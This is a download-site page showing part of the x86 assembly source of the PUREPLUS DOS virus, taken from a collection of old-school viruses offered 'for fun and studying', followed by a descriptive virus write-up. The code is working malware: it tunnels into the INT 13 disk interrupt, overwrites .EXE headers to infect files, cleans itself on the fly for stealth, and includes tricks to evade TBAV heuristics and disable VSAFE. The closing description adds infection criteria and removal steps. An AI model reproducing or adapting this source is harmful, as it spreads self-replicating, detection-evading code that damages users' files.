⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 pureplus.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
💻 ASM
📖 第 1 页 / 共 2 页
字号:
		add     bx,FILENAME_OFFSET
		push    es		;get the filename into ds:bx
		pop     ds
		call    open_n_read_exe	;open, read cx bytes, close file ds:bx
		mov     ah,high(FIND_NEXT)
		loop    find_next_file	;loop until no more matches
done:           mov     ah,high(GET_ERROR_LEVEL)
		int     DOS_INT		;get spawned childs program errorlevel
		mov     ah,high(TERMINATE_W_ERR)
now_run_it      endp			;and return with that same errorlevel

;-----------------------------------------------------------------------------

call_dos        proc    near		;routine to call dos
		int     DOS_INT		;call dos
		jc      done		;error in doing so then exit
		xchg    ax,bx		;set bx to ax for open file stuff
		push    cs		;set ds to cs
		pop     ds		;for all sorts of stuff
		mov     ax,JOB_FILE_TABLE
		ret			;get job file table
call_dos        endp			;(done here for anti TBAV hueristic scan)

;-----------------------------------------------------------------------------

exec_table      db      COMMAND_LINE,FIRST_FCB,SECOND_FCB
					;these are used to create the 14 byte exec
                                        ;table to rerun program

;-----------------------------------------------------------------------------

open_n_read_exe proc    near		;opens file at ds:bx reads cx bytes then closes
		mov     dx,bx		;set dx to bx for dos call to open file
		mov     ax,OPEN_W_HANDLE+DENY_NONE+ONLY_READ
		call    call_dos	;just open it for reading (don't sound any alarms)
		mov     dx,offset critical_error
		mov     ax,DOS_SET_INT+CRITICAL_INT
		int     DOS_INT		;see that the call_dos set ds to cs for setting critical error handler
		inc     dh		;just some dummy area outside in the heap to read the header of the file to
		mov     ah,high(READ_W_HANDLE)
		int     DOS_INT		;read it
reclose_it:     mov     ah,high(CLOSE_HANDLE)
		jmp     short call_dos	;goto close it
open_n_read_exe endp

;-----------------------------------------------------------------------------

interrupt_one   proc    far		;trace interrupt to imbed into int 13 chain at FFFF:????
		cmp     ax,VERIFY_3SECTORS
		jne     interrupt_ret	;if not doing int 13 stuff just leave
		push    ds		;push varables on stack
		pusha
		mov     bp,sp		;make bp the sp
		lds     si,dword ptr ss:[bp+EIGHTEEN_BYTES]
		cmp     word ptr ds:[si+ONE_BYTE],FAR_INDEX_CALL
		jne     go_back		;compare the instruction to a far call function
		mov     si,word ptr ds:[si+THREE_BYTES]
		cmp     word ptr ds:[si+TWO_BYTES],HMA_SEGMENT
		jne     go_back		;compare the address of the call to segment FFFFh
		cld			;if match then cx is pointing to the far call EAh at 
		mov     di,cx		;the end of virii that needs to be updated
		movsw			;move the address to our code
		movsw			;far addresses are 4 bytes long
		sub     di,word ptr (offset far_ptr_addr)-word ptr (offset int_13_entry)
		org     $-REMOVE_NOP	;now patch in our code into the call chain. only need to change offset because segment is already FFFFh
		mov     word ptr ds:[si-FOUR_BYTES],di
		and     byte ptr ss:[bp+TWENTY_THREE],high(UN_SINGLE_STEP)
go_back:        popa			;no longer need to singel step
		pop     ds		;pop off varables
critical_error: mov     al,FAIL		;set al to fail for critical error handler (al is a fail 03h anyway from above code ax verify_3sectors 0403h)
interrupt_ret:  iret			;dual useage of iret.  critical error and int 1
interrupt_one   endp			;after running int 1 routine through an int 13 chain we should be hooked in

;-----------------------------------------------------------------------------

exe_file_mask   db      '*.E*',NULL	;.EXE file mask (doesn't need to be specific) also anti TBAV hueristic scan

;-----------------------------------------------------------------------------

convert_back    proc    near		;will convert virii sector es:bx back to clean sector
		call    ax_cx_di_si_cld	;get all them varables
		repe    cmps byte ptr cs:[si],es:[di]
		jne     not_pure	;does it compare byte for byte with our code
		xor     byte ptr ds:[bx],ah
		call    ax_cx_di_si_cld	;if it does change the jmp 015C to an MZ EXE header signature
		rep     stosb		;and zero out all the code
not_pure:       ret			;go back to where you once belonged
convert_back    endp			

;-----------------------------------------------------------------------------

convert_to      proc    near		;will convert sector ds:bx into virii infected
		pusha			;save varables onto stack
		stc			;say that we failed
		pushf			;push failed onto the stack
                mov	ax,EXE_SIGNATURE;done this way for anti TBAV hueristic scan
		cmp     word ptr ds:[bx],ax
		jne     not_exe_header	;if not an EXE header then not interested
		mov     ax,word ptr ds:[bx+EXE_SECTOR_SIZE]
		cmp     ax,MAX_SECTORS	;is size of EXE small enough to run as a COM file
		ja      not_exe_header	;if not then not interested
		cmp     al,SETVER_SIZE	;was the file the length of SETVER.EXE if so then not interested
		je      not_exe_header	;(won't load correctly in CONFIG.SYS if SETVER.EXE is infected)
		cmp     word ptr ds:[bx+NEW_EXE_OFFSET],NEW_EXE_HEADER
		jae     not_exe_header	;was it a new EXE header (Windows etc) if so then not interested
		call    ax_cx_di_si_cld	;get all them varables
		pusha			;save'em
		repe    scasb		;was there nothin but 00's at offset 71 to 512 of the sector
		popa			;get'em again
		jne     not_exe_header	;if not then not interested
		xor     byte ptr ds:[bx],ah
		rep     movs byte ptr es:[di],cs:[si]
		popf			;if all criteria were met for infection then modify sector in memory and insert virii
		clc			;pop off the fail indicator
		pushf			;and push on the passed indicator
not_exe_header: popf			;get passed/failed indicator
		popa			;get varables from stack
		ret			;go back to where you once belonged
convert_to      endp

;-----------------------------------------------------------------------------

interrupt_13    proc    far		;will read the sectors at es:bx and infect them if necessary and or clean them on the fly
int_13_entry:   cmp     ah,high(READ_A_SECTOR)
		jb      call_old_int_13	;only interested in reads, writes and verifys
		cmp     ah,high(VERIFY_3SECTORS)
		ja      call_old_int_13	;if otherwise then go to old int 13
		push    ds		;save ds
		push    es		;so we can make ds the same as es and save a few bytes
		pop     ds
		call    convert_to	;try to convert it to a virii sector
		pushf			;set up for interrupt simulation
		push    cs		;push the cs onto the stack for the iret
		call    call_old_int_13	;if command was to write then an infected write occured else memory got overwritten with the read
		pushf			;save the result of the int 13 call
		call    convert_to	;does it need to be converted to a virii sector
		pusha			;save the varables onto the stack
		jc      do_convertback	;if not then see if it needs cleaning
		mov     ax,WRITE_A_SECTOR
		pushf			;now lets write the virii infected sector back to disk
		push    cs		;simulate an int 13 execution
		call    call_old_int_13	;and do it
do_convertback: call    convert_back	;does the sector need to be cleaned on the fly
		popa			;if it just wrote to the disk then it will need to be cleaned
		popf			;or if it is a virii infected sector then clean it
		pop     ds		;pop off the varables and the result of int 13 simulation done above
		retf    KEEP_CF_INTACT	;then leave this routine with the carry flag intact
interrupt_13    endp

;-----------------------------------------------------------------------------

signature	db	'Q'		;must leave my calling card

;-----------------------------------------------------------------------------

		org     COM_OFFSET+SECTOR_SIZE-ONE_BYTE
                			;must be a far jmp at the last of the sector
                                        ;the address of the jmp is in the heap area
                                        ;and is filled in by the int 1 trace routine

;-----------------------------------------------------------------------------

call_old_int_13 proc    near		;far call to actual int 13 that is loaded in the HMA by DOS
		jmp     far ptr old_int_13_addr
call_old_int_13 endp

;-----------------------------------------------------------------------------

		org     COM_OFFSET+SECTOR_SIZE
                			;overwrites the address of above but that address
                                        ;is not necessary until the virii goes resident in the HMA

;-----------------------------------------------------------------------------

goto_dos        proc    near		;this is our simple EXE file that we infected
		mov     ax,TERMINATE_W_ERR
		nop			;it just simply ends
far_ptr_addr:   int     DOS_INT		;terminate program
goto_dos        endp

;-----------------------------------------------------------------------------

pureplus        endp			;close up and go home
cseg            ends
end             com_code

;-----------------------------------------------------------------------------

Virus Name:  PUREPLUS
Aliases:
V Status:    New, Research Viron
Discovery:   March, 1994
Symptoms:    None - Pure Stealth
Origin:      USA
Eff Length:  441 Bytes
Type Code:   OReE - Extended HMA Memory Resident Overwriting .EXE Infector
Detection Method:  None
Removal Instructions:  See Below

General Comments:

	The PUREPLUS virus is a HMA memory resident overwriting direct action
	infector. The virus is a pure 100% stealth virus with no detectable
	symptoms.  No file length increase; overwritten .EXE files execute
	properly; no interrupts are directly hooked; no change in file date or
	time; no change in available memory; INT 12 is not moved; no cross
	linked files from CHKDSK; when resident the virus cleans programs on
	the fly; works with all 80?86 processors; VSAFE.COM does not detect
	any changes; Thunder Byte's Heuristic virus detection does not detect
	the virus; Windows 3.1's built in warning about a possible virus does
	not detect PUREPLUS.

        The PUREPLUS is a variation of the PURE virus that will cause
	VSAFE.COM to uninstall.

	The PUREPLUS virus will only load if DOS=HIGH in the CONFIG.SYS file.
	The first time an infected .EXE file is executed, the virus goes
	memory resident in the HMA (High Memory Area).  The hooking of INT 13
	is accomplished using a tunnelling technique, so memory mapping
	utilities will not map it to the virus in memory.  It then reloads the
	infected .EXE file, cleans it on the fly, then executes it.  After the
	program has been executed, PUREPLUS will attempt to infect 15 .EXE
	files in the current directory.

	If the PUREPLUS virus is unable to install in the HMA or clean the
	infected .EXE on the fly, the virus will reopen the infected .EXE file
	for read-only; modify the system file table for write; remove itself,
	and then write the cleaned code back to the .EXE file.  It then
	reloads the clean .EXE file and executes it.  The virus can not clean
	itself on the fly if the disk is compressed with DBLSPACE or STACKER,
	so it will clean the infected .EXE file and write it back.  It will
	also clean itself on an 8086 or 8088 processor.

	It will infect an .EXE if it is executed, opened for any reason or
	even copied.  When an uninfected .EXE is copied, both the source and
	destination .EXE file are infected.

	The PUREPLUS virus overwrites the .EXE header if it meets certain
	criteria.  The .EXE file must be less than 62K.  The file does not
	have an extended .EXE header.  The file is not SETVER.EXE.  The .EXE
	header must be all zeros from offset 71 to offset 512; this is where
	the PUREPLUS virus writes it code.  The PUREPLUS virus then changes
	the .EXE header to a .COM file.  Files that are READONLY can also be
	infected.

	To remove the virus from your system, change DOS=HIGH to DOS=LOW in
	your CONFIG.SYS file.  Reboot the system.  Then run each .EXE file
	less than 62k.  The virus will remove itself from each .EXE program
	when it is executed.  Or, leave DOS=HIGH in you CONFIG.SYS; execute
	an infected .EXE file, then use a tape backup unit to copy all your
	files.  The files on the tape have had the virus removed from them.
	Change DOS=HIGH to DOS=LOW in your CONFIG.SYS file.  Reboot the
	system.  Restore from tape all the files back to your system.

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -